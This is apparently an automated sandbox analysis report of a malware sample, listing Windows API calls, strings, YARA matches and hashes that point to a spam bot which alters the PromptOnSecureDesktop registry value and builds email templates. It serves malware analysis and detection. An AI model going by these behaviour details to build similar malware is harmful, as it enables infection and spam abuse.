                                                                                        Similarity
                                                                                        • API ID: gethostbynameinet_addr
                                                                                        • String ID: time_cfg$u6A
                                                                                        • API String ID: 1594361348-1940331995
                                                                                        • Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                        • Instruction ID: d43b75939b41592048fe0ca6c52da4e7ff184b729316fa9b1a1b1f3021383110
                                                                                        • Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
                                                                                        • Instruction Fuzzy Hash: BFE012306045219FDB509B2CF848ADA77E5EF4A230F098595F854D72A0C774ECC19754
                                                                                        APIs
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080), ref: 026169E5
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002), ref: 02616A26
                                                                                        • GetFileSize.KERNEL32(000000FF,00000000), ref: 02616A3A
                                                                                        • CloseHandle.KERNEL32(000000FF), ref: 02616BD8
                                                                                          • Part of subcall function 0261EE95: GetProcessHeap.KERNEL32(00000000,?,00000000,02611DCF,?), ref: 0261EEA8
                                                                                          • Part of subcall function 0261EE95: HeapFree.KERNEL32(00000000), ref: 0261EEAF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$AttributesHeap$CloseFreeHandleProcessSize
                                                                                        • String ID:
                                                                                        • API String ID: 3384756699-0
                                                                                        • Opcode ID: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
                                                                                        • Instruction ID: 357780723b22bccbcad5ae1c38e4803498ef83cebc5d47abffc2aa03fc5ab711
                                                                                        • Opcode Fuzzy Hash: 7cb1483d7ca4a0334585b6ef60a3fe03637638a32adcd708d2059a772ed48796
                                                                                        • Instruction Fuzzy Hash: 2D71187590021DEFDF10DFA4CC80AEEBBB9FB04358F14856AE515A6290D730AE92DB60
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf
                                                                                        • String ID: %u.%u.%u.%u.%s$localcfg
                                                                                        • API String ID: 2111968516-120809033
                                                                                        • Opcode ID: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
                                                                                        • Instruction ID: f60862e96afe744063ef1f8e151e0253a3d6131670b42bf9f562b78b9aabf051
                                                                                        • Opcode Fuzzy Hash: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
                                                                                        • Instruction Fuzzy Hash: 3C41C1729042999FDB21DF798D44BEE7BE89F49310F240066FD64E3192D639EA04CBA4
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 026141AB
                                                                                        • GetLastError.KERNEL32 ref: 026141B5
                                                                                        • WaitForSingleObject.KERNEL32(?,?), ref: 026141C6
                                                                                        • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 026141D9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3373104450-0
                                                                                        • Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                        • Instruction ID: 6ee90ddb55d8bf4d15105e189d5e7195892d33c589788df7612848ef858e4411
                                                                                        • Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                        • Instruction Fuzzy Hash: DF01297651110AABDF02DF95ED85BEE3B6CEB18355F004061F901F2150DB70AA518BB5
                                                                                        APIs
                                                                                        • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0261421F
                                                                                        • GetLastError.KERNEL32 ref: 02614229
                                                                                        • WaitForSingleObject.KERNEL32(?,?), ref: 0261423A
                                                                                        • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 0261424D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 888215731-0
                                                                                        • Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                        • Instruction ID: c1864e4951c703adcdb6eeb943d700fe9dee77e41982586954dd6e1d7b183bb1
                                                                                        • Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                        • Instruction Fuzzy Hash: 3C01A572511109ABDF01DF90ED84BEE7BACEB08355F148461F901E2150DB70AA948BB6
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403F44
                                                                                        • GetLastError.KERNEL32 ref: 00403F4E
                                                                                        • WaitForSingleObject.KERNEL32(00000004,?), ref: 00403F5F
                                                                                        • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F72
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3373104450-0
                                                                                        • Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                        • Instruction ID: 81d5a9f64dfd66904774ebc82d2e0e48c629fa8216d99cd76bf4a5dbd4e59073
                                                                                        • Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                        • Instruction Fuzzy Hash: B9010C7291110AABDF01DF90ED44BEF7B7CEB08356F104066FA01E2190D774DA558BB6
                                                                                        APIs
                                                                                        • ReadFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403FB8
                                                                                        • GetLastError.KERNEL32 ref: 00403FC2
                                                                                        • WaitForSingleObject.KERNEL32(00000004,?), ref: 00403FD3
                                                                                        • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403FE6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                        • String ID:
                                                                                        • API String ID: 888215731-0
                                                                                        • Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                        • Instruction ID: 44fd539f7a3468c5635e20a1652967c761b46accf60e77792ab8a53432005efc
                                                                                        • Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                        • Instruction Fuzzy Hash: A601177291110AAFDF01DF90ED45BEF3B7CEF08356F004062F906E2090D7749A549BA6
                                                                                        APIs
                                                                                        • lstrcmp.KERNEL32(?,80000009), ref: 0261E066
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcmp
                                                                                        • String ID: A$ A$ A
                                                                                        • API String ID: 1534048567-1846390581
                                                                                        • Opcode ID: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
                                                                                        • Instruction ID: 9f9cd7b7188349a4ec7f47406cdf91a24f8a037ab8b45575a5ea5e454d969877
                                                                                        • Opcode Fuzzy Hash: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
                                                                                        • Instruction Fuzzy Hash: E6F09632600742DBCB30CF25D884A82B7E9FF05326B48862BE954C3260D375F4E8CB51
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 0040A4D1
                                                                                        • GetTickCount.KERNEL32 ref: 0040A4E4
                                                                                        • Sleep.KERNEL32(00000000,?,0040C2E9,0040C4E0,00000000,localcfg,?,0040C4E0,00413588,00408810), ref: 0040A4F1
                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2207858713-0
                                                                                        • Opcode ID: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
                                                                                        • Instruction ID: a5473328a7e7118e9aede6741b06156156ec1e7733dd8d1ec56465b12724d56e
                                                                                        • Opcode Fuzzy Hash: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
                                                                                        • Instruction Fuzzy Hash: 7DE0863720131567C6005BA5BD84FAA7B98AB4D761F164072FB08E3280D6AAA99145BF
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00404E9E
                                                                                        • GetTickCount.KERNEL32 ref: 00404EAD
                                                                                        • Sleep.KERNEL32(0000000A,?,00000001), ref: 00404EBA
                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 00404EC3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2207858713-0
                                                                                        • Opcode ID: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                        • Instruction ID: 0be737a4b1ecb403dd0b6a084e6b0260aeafc6613011e157a8d43e60cd200510
                                                                                        • Opcode Fuzzy Hash: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                        • Instruction Fuzzy Hash: 6AE086B620121457D61027B9FD84F966A89AB9A361F010532F70DE21C0C6AA989345FD
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00404BDD
                                                                                        • GetTickCount.KERNEL32 ref: 00404BEC
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,00000004,004050F2), ref: 00404BF9
                                                                                        • InterlockedExchange.KERNEL32(-00000008,00000001), ref: 00404C02
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2207858713-0
                                                                                        • Opcode ID: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
                                                                                        • Instruction ID: c27c4130c4fb343c81443d6f5f76baf76a02980c1ff66e5fdc0d00212ab38f61
                                                                                        • Opcode Fuzzy Hash: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
                                                                                        • Instruction Fuzzy Hash: FCE0867624521457D61027A66D80FA67BA89B99361F064073F70CE2190C9AAE48141BD
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00403103
                                                                                        • GetTickCount.KERNEL32 ref: 0040310F
                                                                                        • Sleep.KERNEL32(00000000), ref: 0040311C
                                                                                        • InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$ExchangeInterlockedSleep
                                                                                        • String ID:
                                                                                        • API String ID: 2207858713-0
                                                                                        • Opcode ID: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
                                                                                        • Instruction ID: 9edc608f4d32da9f9de986fa19dd3c9deb40157c310ade5cfb00ff6fe32d5b40
                                                                                        • Opcode Fuzzy Hash: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
                                                                                        • Instruction Fuzzy Hash: 51E0C235200215ABDB00AF75BD44B8A6E9EDF8C762F014432F205EA1E0C9F44D51897A
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(00000001,026144E2,00000000,00000000,00000000), ref: 0261E470
                                                                                        • CloseHandle.KERNEL32(00000001,00000003), ref: 0261E484
                                                                                          • Part of subcall function 0261E2FC: RegCreateKeyExA.ADVAPI32(80000001,0261E50A,00000000,00000000,00000000,00020106,00000000,0261E50A,00000000,000000E4), ref: 0261E319
                                                                                          • Part of subcall function 0261E2FC: RegSetValueExA.ADVAPI32(0261E50A,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0261E38E
                                                                                          • Part of subcall function 0261E2FC: RegDeleteValueA.ADVAPI32(0261E50A,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0261E3BF
                                                                                          • Part of subcall function 0261E2FC: RegCloseKey.ADVAPI32(0261E50A,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0261E50A), ref: 0261E3C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseValue$CreateDeleteFileHandleWrite
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 4151426672-2980165447
                                                                                        • Opcode ID: f9347908c3accb151d66d4a2045a2710535659ff764f1ec32379916764927f64
                                                                                        • Instruction ID: cc01ddd89dbac505d81566559ad1ed97ed1b442f64e2b45f009cdc262f0a9e28
                                                                                        • Opcode Fuzzy Hash: f9347908c3accb151d66d4a2045a2710535659ff764f1ec32379916764927f64
                                                                                        • Instruction Fuzzy Hash: E541B871D00214BAEB206F918C46FEB3B6DEF04764F1C8029FD0994191E7B6E650DBB5
                                                                                        APIs
                                                                                        • WriteFile.KERNEL32(00000001,0040DAE0,00000000,00000000,00000000), ref: 0040E209
                                                                                        • CloseHandle.KERNEL32(00000001,00000003), ref: 0040E21D
                                                                                          • Part of subcall function 0040E095: RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
                                                                                          • Part of subcall function 0040E095: RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E127
                                                                                          • Part of subcall function 0040E095: RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E158
                                                                                          • Part of subcall function 0040E095: RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseValue$CreateDeleteFileHandleWrite
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 4151426672-2980165447
                                                                                        • Opcode ID: b35f9f727470473fe34b0fcdae204b38b052469ea0fd64ba9bdd2db24e4b8a6b
                                                                                        • Instruction ID: b34283ca0245a4d5345772c7626065eb71a791ff6ac24fd5689ebe733b27dfc9
                                                                                        • Opcode Fuzzy Hash: b35f9f727470473fe34b0fcdae204b38b052469ea0fd64ba9bdd2db24e4b8a6b
                                                                                        • Instruction Fuzzy Hash: 5D41DB71940214BADB205E938C06FDB3F6CEB44754F1084BEFA09B41D2E6B99A60D6BD
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?), ref: 026183C6
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?), ref: 02618477
                                                                                          • Part of subcall function 026169C3: SetFileAttributesA.KERNEL32(?,00000080), ref: 026169E5
                                                                                          • Part of subcall function 026169C3: SetFileAttributesA.KERNEL32(?,00000002), ref: 02616A26
                                                                                          • Part of subcall function 026169C3: GetFileSize.KERNEL32(000000FF,00000000), ref: 02616A3A
                                                                                          • Part of subcall function 0261EE95: GetProcessHeap.KERNEL32(00000000,?,00000000,02611DCF,?), ref: 0261EEA8
                                                                                          • Part of subcall function 0261EE95: HeapFree.KERNEL32(00000000), ref: 0261EEAF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$AttributesHeap$CloseFreeOpenProcessSize
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 359188348-2980165447
                                                                                        • Opcode ID: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
                                                                                        • Instruction ID: d0312ea22b43ca6d0f64d5cf53bbab9cfb60ec253943d7da28b916942b031b46
                                                                                        • Opcode Fuzzy Hash: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
                                                                                        • Instruction Fuzzy Hash: DC4175B2900159BFEB10EBA09D81EFF777DEB04344F18446AE904D7110FBB16A548B54
                                                                                        APIs
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,0261E859,00000000,00020119,0261E859,PromptOnSecureDesktop), ref: 0261E64D
                                                                                        • RegCloseKey.ADVAPI32(0261E859,?,?,?,?,000000C8,000000E4), ref: 0261E787
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 47109696-2980165447
                                                                                        • Opcode ID: ca61599b3ee270ad7d52ab6b22e6fbb0cb95010ae32332e4c3022532ab02544e
                                                                                        • Instruction ID: 7e81e42245d51cef4866fa7618778d776e3cfc2501d5b8abe9aaf741bb84da1a
                                                                                        • Opcode Fuzzy Hash: ca61599b3ee270ad7d52ab6b22e6fbb0cb95010ae32332e4c3022532ab02544e
                                                                                        • Instruction Fuzzy Hash: 2D41EAB2D0021DBFDF11DF94DC85DEEBB79FF04304F18446AEA10A6160E372AA559B64
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 0261AFFF
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0261B00D
                                                                                          • Part of subcall function 0261AF6F: gethostname.WS2_32(?,00000080), ref: 0261AF83
                                                                                          • Part of subcall function 0261AF6F: lstrcpy.KERNEL32(?,00410B90), ref: 0261AFE6
                                                                                          • Part of subcall function 0261331C: gethostname.WS2_32(?,00000080), ref: 0261333F
                                                                                          • Part of subcall function 0261331C: gethostbyname.WS2_32(?), ref: 02613349
                                                                                          • Part of subcall function 0261AA0A: inet_ntoa.WS2_32(00000000), ref: 0261AA10
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                        • String ID: %OUTLOOK_BND_
                                                                                        • API String ID: 1981676241-3684217054
                                                                                        • Opcode ID: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
                                                                                        • Instruction ID: 2c55fce878c3543941cf21b0e74a3b32e18ea838921b649f483db7f156ac32d7
                                                                                        • Opcode Fuzzy Hash: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
                                                                                        • Instruction Fuzzy Hash: 47412F7290034CABDB25EFA0DC45EEE3BADFF08304F18442AF92992151EA75E654CF58
                                                                                        APIs
                                                                                        • ShellExecuteA.SHELL32(00000000,00000000,00000020,00000022,00000000,00000000), ref: 02619536
                                                                                        • Sleep.KERNEL32(000001F4), ref: 0261955D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExecuteShellSleep
                                                                                        • String ID:
                                                                                        • API String ID: 4194306370-3916222277
                                                                                        • Opcode ID: 441ad30f2646d1b8623b46c1d7e45f404d08a6258c9d37c2b51fbe89c32dcb37
                                                                                        • Instruction ID: e46d03455dce8af61e0cada6633579497bc06da0700ee18db5c627b7ca840db0
                                                                                        • Opcode Fuzzy Hash: 441ad30f2646d1b8623b46c1d7e45f404d08a6258c9d37c2b51fbe89c32dcb37
                                                                                        • Instruction Fuzzy Hash: C44116718093846FFB368B68D8AD7B63FE49B02318F1C41A5D482A72A2D7B46981C711
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 0261B9D9
                                                                                        • InterlockedIncrement.KERNEL32(00413648), ref: 0261BA3A
                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 0261BA94
                                                                                        • GetTickCount.KERNEL32 ref: 0261BB79
                                                                                        • GetTickCount.KERNEL32 ref: 0261BB99
                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 0261BE15
                                                                                        • closesocket.WS2_32(00000000), ref: 0261BEB4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountIncrementInterlockedTick$closesocket
                                                                                        • String ID: %FROM_EMAIL
                                                                                        • API String ID: 1869671989-2903620461
                                                                                        • Opcode ID: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
                                                                                        • Instruction ID: a0d8aafca14de9d2815d699dc372a146b6513ebc39b0f0ad8a632fce1ab55050
                                                                                        • Opcode Fuzzy Hash: 0090938f495b36ecde0c2704714dbc7a7bc2631707f40fe0f7850b313d5ec50d
                                                                                        • Instruction Fuzzy Hash: 0031B171900248DFDF25DFA4DC84BEDB7B9EB48704F28405AFA24821A0DB71EA85CF54
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick
                                                                                        • String ID: localcfg
                                                                                        • API String ID: 536389180-1857712256
                                                                                        • Opcode ID: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                        • Instruction ID: 1ef816322ecc1e041cdf399b9b138f6358d408137adc4a714cdb07e14db9ba06
                                                                                        • Opcode Fuzzy Hash: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                        • Instruction Fuzzy Hash: 0821C631610115AFCB109F64DE8169ABBB9EF20311B25427FD881F72D1DF38E940875C
                                                                                        APIs
                                                                                        Strings
                                                                                        • Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 0040C057
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTickwsprintf
                                                                                        • String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl
                                                                                        • API String ID: 2424974917-1012700906
                                                                                        • Opcode ID: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                        • Instruction ID: 59a0723085258e1b6130595cff45262f63c8180c8ffe05f2a9b9c441a6a96c57
                                                                                        • Opcode Fuzzy Hash: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                        • Instruction Fuzzy Hash: 53115672200100FFDB529BA9DD44E567FA6FB88319B3491ACF6188A166D633D863EB50
                                                                                        APIs
                                                                                          • Part of subcall function 004030FA: GetTickCount.KERNEL32 ref: 00403103
                                                                                          • Part of subcall function 004030FA: InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00403929
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00403939
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CurrentThread$CountExchangeInterlockedTick
                                                                                        • String ID: %FROM_EMAIL
                                                                                        • API String ID: 3716169038-2903620461
                                                                                        • Opcode ID: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                        • Instruction ID: b7f4056d5a805f6dc72f55654bcd4db07a73235d6c8b9c95532e416c15eafef7
                                                                                        • Opcode Fuzzy Hash: ef9999c53fb079ee60b66104ed5eee9301c2c40c50ee899f7204c173007e787c
                                                                                        • Instruction Fuzzy Hash: 7B113DB5900214EFD720DF16D581A5DF7F8FB05716F11856EE844A7291C7B8AB80CFA8
                                                                                        APIs
                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 026170BC
                                                                                        • LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,?,?), ref: 026170F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Name$AccountLookupUser
                                                                                        • String ID: |
                                                                                        • API String ID: 2370142434-2343686810
                                                                                        • Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                        • Instruction ID: c934aac9c002d020108046fbac3637c024ecac5409e9adfc9b79e1ae78a6dee6
                                                                                        • Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
                                                                                        • Instruction Fuzzy Hash: 43111E7290411CEBDF12CFE4DC85ADEF7BDAB09715F2841A6E501E6194D770AB88CBA0
                                                                                        APIs
                                                                                          • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                          • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                        • GetComputerNameA.KERNEL32(?,0000000F), ref: 00401BA3
                                                                                        • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00401EFD,00000000,00000000,00000000,00000000), ref: 00401BB8
